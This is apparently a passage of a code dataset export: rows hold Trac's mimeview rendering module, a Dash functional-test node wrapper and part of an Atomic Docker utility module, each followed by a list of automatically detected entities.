renderer.get_quality_ratio(mimetype) + if qr > 0: + candidates.append((qr, renderer)) + candidates.sort(lambda x, y: cmp(y[0], x[0])) + + # Wrap file-like object so that it can be read multiple times + if hasattr(content, 'read'): + content = Content(content, self.max_preview_size) + + # First candidate which renders successfully wins. + # Also, we don't want to expand tabs more than once. + expanded_content = None + for qr, renderer in candidates: + if force_source and not getattr(renderer, 'returns_source', False): + continue # skip non-source renderers in force_source mode + if isinstance(content, Content): + content.reset() + try: + ann_names = ', '.join(annotations) if annotations else \ + 'no annotations' + self.log.debug('Trying to render HTML preview using %s [%s]', + renderer.__class__.__name__, ann_names) + + # check if we need to perform a tab expansion + rendered_content = content + if getattr(renderer, 'expand_tabs', False): + if expanded_content is None: + content = content_to_unicode(self.env, content, + full_mimetype) + expanded_content = content.expandtabs(self.tab_width) + rendered_content = expanded_content + + result = renderer.render(context, full_mimetype, + rendered_content, filename, url) + if not result: + continue + + if not (force_source or getattr(renderer, 'returns_source', + False)): + # Direct rendering of content + if isinstance(result, basestring): + if not isinstance(result, unicode): + result = to_unicode(result) + return Markup(to_unicode(result)) + elif isinstance(result, Fragment): + return result.generate() + else: + return result + + # Render content as source code + if annotations: + m = context.req.args.get('marks') if context.req else None + return self._render_source(context, result, annotations, + m and Ranges(m)) + else: + if isinstance(result, list): + result = Markup('\n').join(result) + return tag.div(class_='code')(tag.pre(result)).generate() + + except Exception, e: + self.log.warning('HTML preview using %s failed: %s', + renderer.__class__.__name__, + exception_to_unicode(e, traceback=True)) + if context.req and not context.get_hint('disable_warnings'): + from trac.web.chrome import add_warning + add_warning(context.req, + _(""HTML preview using %(renderer)s failed (%(err)s)"", + renderer=renderer.__class__.__name__, + err=exception_to_unicode(e))) + + def _render_source(self, context, stream, annotations, marks=None): + from trac.web.chrome import add_warning + annotators, labels, titles = {}, {}, {} + for annotator in self.annotators: + atype, alabel, atitle = annotator.get_annotation_type() + if atype in annotations: + labels[atype] = alabel + titles[atype] = atitle + annotators[atype] = annotator + annotations = [a for a in annotations if a in annotators] + + if isinstance(stream, list): + stream = HTMLParser(StringIO(u'\n'.join(stream))) + elif isinstance(stream, unicode): + text = stream + def linesplitter(): + for line in text.splitlines(True): + yield TEXT, line, (None, -1, -1) + stream = linesplitter() + + annotator_datas = [] + for a in annotations: + annotator = annotators[a] + try: + data = (annotator, annotator.get_annotation_data(context)) + except TracError, e: + self.log.warning(""Can't use annotator '%s': %s"", a, e.message) + add_warning(context.req, tag.strong( + tag_(""Can't use %(annotator)s annotator: %(error)s"", + annotator=tag.em(a), error=tag.pre(e.message)))) + data = (None, None) + annotator_datas.append(data) + + def _head_row(): + return tag.tr( + [tag.th(labels[a], class_=a, title=titles[a]) + for a in annotations] + + [tag.th(u'\xa0', class_='content')] + ) + + def _body_rows(): + for idx, line in enumerate(_group_lines(stream)): + row = tag.tr() + if marks and idx + 1 in marks: + row(class_='hilite') + for annotator, data in annotator_datas: + if annotator: + annotator.annotate_row(context, row, idx+1, line, data) + else: + row.append(tag.td()) + row.append(tag.td(line)) + yield row + + return tag.table(class_='code')( + tag.thead(_head_row()), + tag.tbody(_body_rows()) + ) + + def get_max_preview_size(self): + """""":deprecated: use `max_preview_size` attribute directly."""""" + return self.max_preview_size + + def get_charset(self, content='', mimetype=None): + """"""Infer the character encoding from the `content` or the `mimetype`. + + `content` is either a `str` or an `unicode` object. + + The charset will be determined using this order: + * from the charset information present in the `mimetype` argument + * auto-detection of the charset from the `content` + * the configured `default_charset` + """""" + if mimetype: + ctpos = mimetype.find('charset=') + if ctpos >= 0: + return mimetype[ctpos + 8:].strip() + if isinstance(content, str): + utf = detect_unicode(content) + if utf is not None: + return utf + return self.default_charset + + @property + def mime_map(self): + # Extend default extension to MIME type mappings with configured ones + if not self._mime_map: + self._mime_map = MIME_MAP.copy() + for mapping in self.config['mimeviewer'].getlist('mime_map'): + if ':' in mapping: + assocations = mapping.split(':') + for keyword in assocations: # Note: [0] kept on purpose + self._mime_map[keyword] = assocations[0] + return self._mime_map + + def get_mimetype(self, filename, content=None): + """"""Infer the MIME type from the `filename` or the `content`. + + `content` is either a `str` or an `unicode` object. + + Return the detected MIME type, augmented by the + charset information (i.e. ""; charset=...""), + or `None` if detection failed. + """""" + + mimetype = get_mimetype(filename, content, self.mime_map) + charset = None + if mimetype: + charset = self.get_charset(content, mimetype) + if mimetype and charset and not 'charset' in mimetype: + mimetype += '; charset=' + charset + return mimetype + + def is_binary(self, mimetype=None, filename=None, content=None): + """"""Check if a file must be considered as binary."""""" + if not mimetype and filename: + mimetype = self.get_mimetype(filename, content) + if mimetype: + mimetype = ct_mimetype(mimetype) + if mimetype in self.treat_as_binary: + return True + if content is not None and is_binary(content): + return True + return False + + def to_utf8(self, content, mimetype=None): + """"""Convert an encoded `content` to utf-8. + + :deprecated: since 0.10, you should use `unicode` strings only. + """""" + return to_utf8(content, self.get_charset(content, mimetype)) + + def to_unicode(self, content, mimetype=None, charset=None): + """"""Convert `content` (an encoded `str` object) to an `unicode` object. + + This calls `trac.util.to_unicode` with the `charset` provided, + or the one obtained by `Mimeview.get_charset()`. + """""" + if not charset: + charset = self.get_charset(content, mimetype) + return to_unicode(content, charset) + + def configured_modes_mapping(self, renderer): + """"""Return a MIME type to `(mode,quality)` mapping for given `option`"""""" + types, option = {}, '%s_modes' % renderer + for mapping in self.config['mimeviewer'].getlist(option): + if not mapping: + continue + try: + mimetype, mode, quality = mapping.split(':') + types[mimetype] = (mode, int(quality)) + except (TypeError, ValueError): + self.log.warning(""Invalid mapping '%s' specified in '%s' "" + ""option."", mapping, option) + return types + + def preview_data(self, context, content, length, mimetype, filename, + url=None, annotations=None, force_source=False): + """"""Prepares a rendered preview of the given `content`. + + Note: `content` will usually be an object with a `read` method. + """""" + data = {'raw_href': url, 'size': length, + 'max_file_size': self.max_preview_size, + 'max_file_size_reached': False, + 'rendered': None, + } + if length >= self.max_preview_size: + data['max_file_size_reached'] = True + else: + result = self.render(context, mimetype, content, filename, url, + annotations, force_source=force_source) + data['rendered'] = result + return data + + def send_converted(self, req, in_type, content, selector, filename='file'): + """"""Helper method for converting `content` and sending it directly. + + `selector` can be either a key or a MIME Type."""""" + from trac.web.api import RequestDone + content, output_type, ext = self.convert_content(req, in_type, + content, selector) + if isinstance(content, unicode): + content = content.encode('utf-8') + req.send_response(200) + req.send_header('Content-Type', output_type) + req.send_header('Content-Length', len(content)) + if filename: + req.send_header('Content-Disposition', + content_disposition(filename='%s.%s' % + (filename, ext))) + req.end_headers() + req.write(content) + raise RequestDone + + +def _group_lines(stream): + space_re = re.compile('(?P (?: +))|^(?P<\w+.*?>)?( )') + def pad_spaces(match): + m = match.group('spaces') + if m: + div, mod = divmod(len(m), 2) + return div * u'\xa0 ' + mod * u'\xa0' + return (match.group('tag') or '') + u'\xa0' + + def _generate(): + stack = [] + def _reverse(): + for event in reversed(stack): + if event[0] is START: + yield END, event[1][0], event[2] + else: + yield END_NS, event[1][0], event[2] + + for kind, data, pos in stream: + if kind is TEXT: + lines = data.split('\n') + if lines: + # First element + for e in stack: + yield e + yield kind, lines.pop(0), pos + for e in _reverse(): + yield e + # Subsequent ones, prefix with \n + for line in lines: + yield TEXT, '\n', pos + for e in stack: + yield e + yield kind, line, pos + for e in _reverse(): + yield e + else: + if kind is START or kind is START_NS: + stack.append((kind, data, pos)) + elif kind is END or kind is END_NS: + stack.pop() + else: + yield kind, data, pos + + buf = [] + + # Fix the \n at EOF. + if not isinstance(stream, list): + stream = list(stream) + found_text = False + + for i in range(len(stream)-1, -1, -1): + if stream[i][0] is TEXT: + e = stream[i] + # One chance to strip a \n + if not found_text and e[1].endswith('\n'): + stream[i] = (e[0], e[1][:-1], e[2]) + if len(e[1]): + found_text = True + break + if not found_text: + raise StopIteration + + for kind, data, pos in _generate(): + if kind is TEXT and data == '\n': + yield Stream(buf[:]) + del buf[:] + else: + if kind is TEXT: + data = space_re.sub(pad_spaces, data) + buf.append((kind, data, pos)) + if buf: + yield Stream(buf[:]) + + +# -- Default annotators + +class LineNumberAnnotator(Component): + """"""Text annotator that adds a column with line numbers."""""" + implements(IHTMLPreviewAnnotator) + + # ITextAnnotator methods + + def get_annotation_type(self): + return 'lineno', _('Line'), _('Line numbers') + + def get_annotation_data(self, context): + return None + + def annotate_row(self, context, row, lineno, line, data): + row.append(tag.th(id='L%s' % lineno)( + tag.a(lineno, href='#L%s' % lineno) + )) + + +# -- Default renderers + +class PlainTextRenderer(Component): + """"""HTML preview renderer for plain text, and fallback for any kind of text + for which no more specific renderer is available. + """""" + implements(IHTMLPreviewRenderer) + + expand_tabs = True + returns_source = True + + def get_quality_ratio(self, mimetype): + if mimetype in Mimeview(self.env).treat_as_binary: + return 0 + return 1 + + def render(self, context, mimetype, content, filename=None, url=None): + if is_binary(content): + self.log.debug(""Binary data; no preview available"") + return + + self.log.debug(""Using default plain text mimeviewer"") + return content_to_unicode(self.env, content, mimetype) + + +class ImageRenderer(Component): + """"""Inline image display. + + This component doesn't need the `content` at all. + """""" + implements(IHTMLPreviewRenderer) + + def get_quality_ratio(self, mimetype): + if mimetype.startswith('image/'): + return 8 + return 0 + + def render(self, context, mimetype, content, filename=None, url=None): + if url: + return tag.div(tag.img(src=url, alt=filename), + class_='image-file') + + +class WikiTextRenderer(Component): + """"""HTML renderer for files containing Trac's own Wiki formatting markup."""""" + implements(IHTMLPreviewRenderer) + + def get_quality_ratio(self, mimetype): + if mimetype in ('text/x-trac-wiki', 'application/x-trac-wiki'): + return 8 + return 0 + + def render(self, context, mimetype, content, filename=None, url=None): + from trac.wiki.formatter import format_to_html + return format_to_html(self.env, context, + content_to_unicode(self.env, content, mimetype)) +",43065,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2004-2010'], ['DATE_TIME', '2004'], ['PERSON', 'Daniel Lundin'], ['DATE_TIME', '2005-2006'], ['PERSON', 'Christopher Lenz'], ['DATE_TIME', '2006-2007'], ['NRP', 'Christian'], ['PERSON', 'Daniel Lundin'], ['PERSON', 'Christopher Lenz'], ['PERSON', 'Markup'], ['PERSON', 'Href'], ['LOCATION', 'self.resource'], ['PERSON', '1).resource'], ['PERSON', 'oneliner'], ['NRP', 'self._hints'], ['PERSON', 'msword'], ['PERSON', ""roff troff'""], ['PERSON', ""ini cfg'""], ['PERSON', 'vba'], ['PERSON', 'ada asm asp'], ['PERSON', 'ksh lua'], ['PERSON', 'tcl tex zsh'], ['PERSON', 'mimetype'], ['PERSON', 'Mark'], ['LOCATION', 'convert_content(req'], ['LOCATION', 'mimetype'], ['PERSON', 'dylan'], ['PERSON', 'msword'], ['NRP', 'input_mimettype'], ['LOCATION', 'mimetype'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['NRP', 'force_source'], ['LOCATION', ""self.log.debug('Trying""], ['NRP', 'force_source'], ['LOCATION', 'basestring'], ['PERSON', ""context.get_hint('disable_warnings""], ['PERSON', 'atitle = annotator.get_annotation_type'], ['LOCATION', 'tag_(""Can\'t'], ['PERSON', 'mimetype'], ['PERSON', 'mimetype'], ['NRP', 'force_source'], ['URL', 'self.ma'], ['PERSON', 'lineno'], ['URL', 'self.log.de'], ['URL', 'tag.im'], ['URL', 'trac.wiki.fo'], ['URL', 'http://trac.edgewall.org/wiki/TracLicense.'], ['URL', 'http://trac.edgewall.org/log/.'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', 'e:: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'genshi.co'], ['URL', 'genshi.in'], ['URL', 'trac.co'], ['URL', 'trac.co'], ['URL', 'trac.re'], ['URL', 'trac.util.tr'], ['URL', 'self.pa'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'trac.web.ch'], ['URL', 'context.resource.re'], ['URL', 'context.re'], ['URL', 'context.pa'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'context.ch'], ['URL', 'self.re'], ['URL', 'self.hr'], ['URL', 'self.pe'], ['URL', 'context.pa'], ['URL', 'context.re'], ['URL', 'self.re'], ['URL', 'context.re'], ['URL', 'context.resource.re'], ['URL', 'resource.re'], ['URL', 'context.resource.id'], ['URL', 'resource.id'], ['URL', 'context.pa'], ['URL', 'ctx.se'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'ctx.se'], ['URL', 'ctx.ge'], ['URL', 'ctx.ge'], ['URL', 'hints.ge'], ['URL', 'ctx.se'], ['URL', 'self.pa'], ['URL', 'p.pa'], ['URL', 'TYPES.ke'], ['URL', 't.st'], ['URL', 'TYPES.se'], ['URL', 'TYPES.it'], ['URL', 're.com'], ['URL', 're.VE'], ['URL', 'mimetypes.gu'], ['URL', 're.se'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'data.st'], ['URL', 'content.re'], ['URL', 'mimeview.ma'], ['URL', 'mimeview.to'], ['URL', 'self.in'], ['URL', 'self.ma'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.input.re'], ['URL', 'self.ma'], ['URL', 'self.content.re'], ['URL', 'self.co'], ['URL', 'self.content.se'], ['URL', 'IContentConverter.ge'], ['URL', 'self.co'], ['URL', 'converter.ge'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'converter.co'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'IHTMLPreviewRenderer.re'], ['URL', 'content.re'], ['URL', 'self.ma'], ['URL', 'self.ge'], ['URL', 'self.re'], ['URL', 'renderer.ge'], ['URL', 'candidates.so'], ['URL', 'self.ma'], ['URL', 'content.re'], ['URL', 'self.log.de'], ['URL', 'renderer.re'], ['URL', 'result.ge'], ['URL', 'context.req.args.ge'], ['URL', 'context.re'], ['URL', 'tag.pr'], ['URL', 'context.re'], ['URL', 'context.ge'], ['URL', 'trac.web.ch'], ['URL', 'context.re'], ['URL', 'trac.web.ch'], ['URL', 'self.an'], ['URL', 'annotator.ge'], ['URL', 'annotator.ge'], ['URL', 'e.me'], ['URL', 'context.re'], ['URL', 'tag.st'], ['URL', 'tag.pr'], ['URL', 'e.me'], ['URL', 'tag.tr'], ['URL', 'tag.th'], ['URL', 'tag.th'], ['URL', 'tag.tr'], ['URL', 'annotator.an'], ['URL', 'tag.td'], ['URL', 'tag.td'], ['URL', 'tag.th'], ['URL', 'self.ma'], ['URL', 'mimetype.fi'], ['URL', 'self.de'], ['URL', 'MAP.co'], ['URL', 'self.co'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.ge'], ['URL', 'trac.util.to'], ['URL', 'Mimeview.ge'], ['URL', 'self.ge'], ['URL', 'self.co'], ['URL', 'self.ma'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 'req.se'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.su'], ['URL', 'tag.th'], ['URL', 'self.log.de'], ['URL', 'mimetype.st']]" +8,"#!/usr/bin/env python3 +# Copyright (c) 2017 The Bitcoin Core developers +# Distributed under the MIT software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +""""""Class for dashd node under test"""""" + +import decimal +import errno +import http.client +import json +import logging +import os +import subprocess +import time + +from .authproxy import JSONRPCException +from .mininode import NodeConn +from .util import ( + assert_equal, + get_rpc_proxy, + rpc_url, + wait_until, + p2p_port, +) + +BITCOIND_PROC_WAIT_TIMEOUT = 60 + +class TestNode(): + """"""A class for representing a dashd node under test. + + This class contains: + + - state about the node (whether it's running, etc) + - a Python subprocess.Popen object representing the running process + - an RPC connection to the node + - one or more P2P connections to the node + + + To make things easier for the test writer, any unrecognised messages will + be dispatched to the RPC connection."""""" + + def __init__(self, i, dirname, extra_args, rpchost, timewait, binary, stderr, mocktime, coverage_dir): + self.index = i + self.datadir = os.path.join(dirname, ""node"" + str(i)) + self.rpchost = rpchost + if timewait: + self.rpc_timeout = timewait + else: + # Wait for up to 60 seconds for the RPC server to respond + self.rpc_timeout = 60 + if binary is None: + self.binary = os.getenv(""BITCOIND"", ""dashd"") + else: + self.binary = binary + self.stderr = stderr + self.coverage_dir = coverage_dir + # Most callers will just need to add extra args to the standard list below. For those callers that need more flexibity, they can just set the args property directly. + self.extra_args = extra_args + self.args = [self.binary, ""-datadir="" + self.datadir, ""-server"", ""-keypool=1"", ""-discover=0"", ""-rest"", ""-logtimemicros"", ""-debug"", ""-debugexclude=libevent"", ""-debugexclude=leveldb"", ""-mocktime="" + str(mocktime), ""-uacomment=testnode%d"" % i] + + self.cli = TestNodeCLI(os.getenv(""BITCOINCLI"", ""dash-cli""), self.datadir) + + # Don't try auto backups (they fail a lot when running tests) + self.args.append(""-createwalletbackups=0"") + + self.running = False + self.process = None + self.rpc_connected = False + self.rpc = None + self.url = None + self.log = logging.getLogger('TestFramework.node%d' % i) + + self.p2ps = [] + + def __getattr__(self, name): + """"""Dispatches any unrecognised messages to the RPC connection."""""" + assert self.rpc_connected and self.rpc is not None, ""Error: no RPC connection"" + return getattr(self.rpc, name) + + def start(self, extra_args=None, stderr=None): + """"""Start the node."""""" + if extra_args is None: + extra_args = self.extra_args + if stderr is None: + stderr = self.stderr + self.process = subprocess.Popen(self.args + extra_args, stderr=stderr) + self.running = True + self.log.debug(""dashd started, waiting for RPC to come up"") + + def wait_for_rpc_connection(self): + """"""Sets up an RPC connection to the dashd process. Returns False if unable to connect."""""" + # Poll at a rate of four times per second + poll_per_s = 4 + for _ in range(poll_per_s * self.rpc_timeout): + assert self.process.poll() is None, ""dashd exited with status %i during initialization"" % self.process.returncode + try: + self.rpc = get_rpc_proxy(rpc_url(self.datadir, self.index, self.rpchost), self.index, timeout=self.rpc_timeout, coveragedir=self.coverage_dir) + self.rpc.getblockcount() + # If the call to getblockcount() succeeds then the RPC connection is up + self.rpc_connected = True + self.url = self.rpc.url + self.log.debug(""RPC successfully started"") + return + except IOError as e: + if e.errno != errno.ECONNREFUSED: # Port not yet open? + raise # unknown IO error + except JSONRPCException as e: # Initialization phase + # -28 RPC in warmup + # -342 Service unavailable, RPC server started but is shutting down due to error + if e.error['code'] != -28 and e.error['code'] != -342: + raise # unknown JSON RPC exception + except ValueError as e: # cookie file not found and no rpcuser or rpcassword. dashd still starting + if ""No RPC credentials"" not in str(e): + raise + time.sleep(1.0 / poll_per_s) + raise AssertionError(""Unable to connect to dashd"") + + def get_wallet_rpc(self, wallet_name): + assert self.rpc_connected + assert self.rpc + wallet_path = ""wallet/%s"" % wallet_name + return self.rpc / wallet_path + + def stop_node(self, wait=0): + """"""Stop the node."""""" + if not self.running: + return + self.log.debug(""Stopping node"") + try: + self.stop(wait=wait) + except http.client.CannotSendRequest: + self.log.exception(""Unable to stop node."") + del self.p2ps[:] + + def is_node_stopped(self): + """"""Checks whether the node has stopped. + + Returns True if the node has stopped. False otherwise. + This method is responsible for freeing resources (self.process)."""""" + if not self.running: + return True + return_code = self.process.poll() + if return_code is None: + return False + + # process has stopped. Assert that it didn't return an error code. + assert_equal(return_code, 0) + self.running = False + self.process = None + self.rpc_connected = False + self.rpc = None + self.log.debug(""Node stopped"") + return True + + def wait_until_stopped(self, timeout=BITCOIND_PROC_WAIT_TIMEOUT): + wait_until(self.is_node_stopped, timeout=timeout) + + def node_encrypt_wallet(self, passphrase): + """"""""Encrypts the wallet. + + This causes dashd to shutdown, so this method takes + care of cleaning up resources."""""" + self.encryptwallet(passphrase) + self.wait_until_stopped() + + def add_p2p_connection(self, p2p_conn, **kwargs): + """"""Add a p2p connection to the node. + + This method adds the p2p connection to the self.p2ps list and also + returns the connection to the caller."""""" + if 'dstport' not in kwargs: + kwargs['dstport'] = p2p_port(self.index) + if 'dstaddr' not in kwargs: + kwargs['dstaddr'] = '127.0.0.1' + self.p2ps.append(p2p_conn) + kwargs.update({'rpc': self.rpc, 'callback': p2p_conn}) + p2p_conn.add_connection(NodeConn(**kwargs)) + + return p2p_conn + + @property + def p2p(self): + """"""Return the first p2p connection + + Convenience property - most tests only use a single p2p connection to each + node, so this saves having to write node.p2ps[0] many times."""""" + assert self.p2ps, ""No p2p connection"" + return self.p2ps[0] + + def disconnect_p2ps(self): + """"""Close all p2p connections to the node."""""" + for p in self.p2ps: + # Connection could have already been closed by other end. + if p.connection is not None: + p.connection.disconnect_node() + self.p2ps = [] + + +class TestNodeCLI(): + """"""Interface to bitcoin-cli for an individual node"""""" + + def __init__(self, binary, datadir): + self.args = [] + self.binary = binary + self.datadir = datadir + self.input = None + + def __call__(self, *args, input=None): + # TestNodeCLI is callable with bitcoin-cli command-line args + self.args = [str(arg) for arg in args] + self.input = input + return self + + def __getattr__(self, command): + def dispatcher(*args, **kwargs): + return self.send_cli(command, *args, **kwargs) + return dispatcher + + def send_cli(self, command, *args, **kwargs): + """"""Run bitcoin-cli command. Deserializes returned string as python object."""""" + + pos_args = [str(arg) for arg in args] + named_args = [str(key) + ""="" + str(value) for (key, value) in kwargs.items()] + assert not (pos_args and named_args), ""Cannot use positional arguments and named arguments in the same bitcoin-cli call"" + p_args = [self.binary, ""-datadir="" + self.datadir] + self.args + if named_args: + p_args += [""-named""] + p_args += [command] + pos_args + named_args + process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True) + cli_stdout, cli_stderr = process.communicate(input=self.input) + returncode = process.poll() + if returncode: + # Ignore cli_stdout, raise with cli_stderr + raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr) + return json.loads(cli_stdout, parse_float=decimal.Decimal) +",9148,"[['DATE_TIME', '2017'], ['DATE_TIME', '.authproxy'], ['LOCATION', 'JSONRPCException'], ['PERSON', 'dirname'], ['PERSON', 'extra_args'], ['LOCATION', 'rpchost'], ['DATE_TIME', 'up to 60 seconds'], ['URL', 'logging.ge'], ['URL', 'TestFramework.no'], ['PERSON', 'extra_args'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.log.de'], ['LOCATION', 'JSONRPCException'], ['LOCATION', 'http.client'], ['LOCATION', 'p2p_conn'], ['PERSON', ""kwargs['dstport""], ['LOCATION', 'self.p2ps.append(p2p_conn'], ['PERSON', 'returncode ='], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'http.cl'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.bi'], ['URL', 'os.ge'], ['URL', 'self.bi'], ['URL', 'self.st'], ['URL', 'self.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.cl'], ['URL', 'os.ge'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.st'], ['URL', 'self.pro'], ['URL', 'self.ar'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.pro'], ['URL', 'self.process.re'], ['URL', 'self.co'], ['URL', 'self.rpc.ge'], ['URL', 'e.er'], ['URL', 'errno.EC'], ['URL', 'e.er'], ['URL', 'e.er'], ['URL', 'time.sl'], ['URL', 'self.ru'], ['URL', 'self.log.de'], ['URL', 'self.st'], ['URL', 'http.client.Ca'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.ru'], ['URL', 'self.pro'], ['URL', 'self.log.de'], ['URL', 'self.is'], ['URL', 'self.in'], ['URL', 'conn.ad'], ['URL', 'p.co'], ['URL', 'p.co'], ['URL', 'self.ar'], ['URL', 'self.bi'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'kwargs.it'], ['URL', 'self.bi'], ['URL', 'self.ar'], ['URL', 'process.com'], ['URL', 'self.in'], ['URL', 'subprocess.Ca'], ['URL', 'self.bi'], ['URL', 'decimal.De']]" +9,"# !/usr/bin/python +# Copyright (C) 2015 Red Hat, All rights reserved. +# AUTHORS: Alex Collins dummy@email.com + +import sys +import json +import subprocess +import collections +from fnmatch import fnmatch as matches +from docker.utils import kwargs_from_env + +import docker +import selinux + +""""""Atomic Utility Module"""""" + +ReturnTuple = collections.namedtuple('ReturnTuple', + ['return_code', 'stdout', 'stderr']) + +if sys.version_info[0] < 3: + input = raw_input +else: + input = input + + +def _decompose(compound_name): + """""" '[reg/]repo[:tag]' -> (reg, repo, tag) """""" + reg, repo, tag = '', compound_name, '' + if '/' in repo: + reg, repo = repo.split('/', 1) + if ':' in repo: + repo, tag = repo.rsplit(':', 1) + return reg, repo, tag + + +def image_by_name(img_name, images=None): + """""" + Returns a list of image data for images which match img_name. Will + optionally take a list of images from a docker.Client.images + query to avoid multiple docker queries. + """""" + i_reg, i_rep, i_tag = _decompose(img_name) + + # Correct for bash-style matching expressions. + if not i_reg: + i_reg = '*' + if not i_tag: + i_tag = '*' + + # If the images were not passed in, go get them. + if images is None: + c = docker.Client(**kwargs_from_env()) + images = c.images(all=False) + + valid_images = [] + for i in images: + for t in i['RepoTags']: + reg, rep, tag = _decompose(t) + if matches(reg, i_reg) \ + and matches(rep, i_rep) \ + and matches(tag, i_tag): + valid_images.append(i) + break + # Some repo after decompose end up with the img_name + # at the end. i.e. rhel7/rsyslog + if rep.endswith(img_name): + valid_images.append(i) + break + return valid_images + + +def subp(cmd): + """""" + Run a command as a subprocess. + Return a triple of return code, standard out, standard err. + """""" + proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, + stderr=subprocess.PIPE) + out, err = proc.communicate() + return ReturnTuple(proc.returncode, stdout=out, stderr=err) + + +def default_container_context(): + if selinux.is_selinux_enabled() != 0: + fd = open(selinux.selinux_lxc_contexts_path()) + for i in fd.readlines(): + name, context = i.split(""="") + if name.strip() == ""file"": + return context.strip(""\n\"" "") + return """" + + +def writeOut(output, lf=""\n""): + sys.stdout.flush() + sys.stdout.write(str(output) + lf) + + +def output_json(json_data): + ''' Pretty print json data ''' + writeOut(json.dumps(json_data, indent=4, separators=(',', ': '))) + + +def print_scan_summary(json_data, names=None): + ''' + Print a summary of the data returned from a + CVE scan. + ''' + max_col_width = 50 + min_width = 15 + + def _max_width(data): + max_name = 0 + for name in data: + max_name = len(data[name]) if len(data[name]) > max_name \ + else max_name + # If the max name length is less that max_width + if max_name < min_width: + max_name = min_width + + # If the man name is greater than the max col leng + # we wish to use + if max_name > max_col_width: + max_name = max_col_width + + return max_name + + clean = True + + if len(names) > 0: + max_width = _max_width(names) + else: + max_width = min_width + template = ""{0:"" + str(max_width) + ""} {1:5} {2:5} {3:5} {4:5}"" + sevs = ['critical', 'important', 'moderate', 'low'] + writeOut(template.format(""Container/Image"", ""Cri"", ""Imp"", ""Med"", ""Low"")) + writeOut(template.format(""-"" * max_width, ""---"", ""---"", ""---"", ""---"")) + res_summary = json_data['results_summary'] + for image in res_summary.keys(): + image_res = res_summary[image] + if 'msg' in image_res.keys(): + tmp_tuple = (image_res['msg'], """", """", """", """") + else: + if len(names) < 1: + image_name = image[:max_width] + else: + image_name = names[image][-max_width:] + if len(image_name) == max_col_width: + image_name = '...' + image_name[-(len(image_name) - 3):] + + tmp_tuple = tuple([image_name] + + [str(image_res[sev]) for sev in sevs]) + sev_results = [image_res[sev] for sev in + sevs if image_res[sev] > 0] + if len(sev_results) > 0: + clean = False + writeOut(template.format(*tmp_tuple)) + writeOut("""") + return clean + + +def print_detail_scan_summary(json_data, names=None): + ''' + Print a detailed summary of the data returned from + a CVE scan. + ''' + clean = True + sevs = ['Critical', 'Important', 'Moderate', 'Low'] + cve_summary = json_data['host_results'] + image_template = "" {0:10}: {1}"" + cve_template = "" {0:10}: {1}"" + for image in cve_summary.keys(): + image_res = cve_summary[image] + writeOut("""") + writeOut(image[:12]) + if not image_res['isRHEL']: + writeOut(image_template.format(""Result"", + ""Not based on Red Hat"" + ""Enterprise Linux"")) + continue + else: + writeOut(image_template.format(""OS"", image_res['os'].rstrip())) + scan_results = image_res['cve_summary']['scan_results'] + + for sev in sevs: + if sev in scan_results: + clean = False + writeOut(image_template.format(sev, + str(scan_results[sev]['num']))) + for cve in scan_results[sev]['cves']: + writeOut(cve_template.format(""CVE"", cve['cve_title'])) + writeOut(cve_template.format(""CVE URL"", + cve['cve_ref_url'])) + writeOut(cve_template.format(""RHSA ID"", + cve['rhsa_ref_id'])) + writeOut(cve_template.format(""RHSA URL"", + cve['rhsa_ref_url'])) + writeOut("""") + return clean + + +def get_mounts_by_path(): + ''' + Gets all mounted devices and paths + :return: dict of mounted devices and related information by path + ''' + mount_info = [] + f = open('/proc/mounts', 'r') + for line in f: + _tmp = line.split("" "") + mount_info.append({'path': _tmp[1], + 'device': _tmp[0], + 'type': _tmp[2], + 'options': _tmp[3] + } + ) + return mount_info + + +def is_dock_obj_mounted(docker_obj): + ''' + Check if the provided docker object, which needs to be an ID, + is currently mounted and should be considered ""busy"" + :param docker_obj: str, must be in ID format + :return: bool True or False + ''' + mount_info = get_mounts_by_path() + devices = [x['device'] for x in mount_info] + # If we can find the ID of the object in the list + # of devices which comes from mount, safe to assume + # it is busy. + return any(docker_obj in 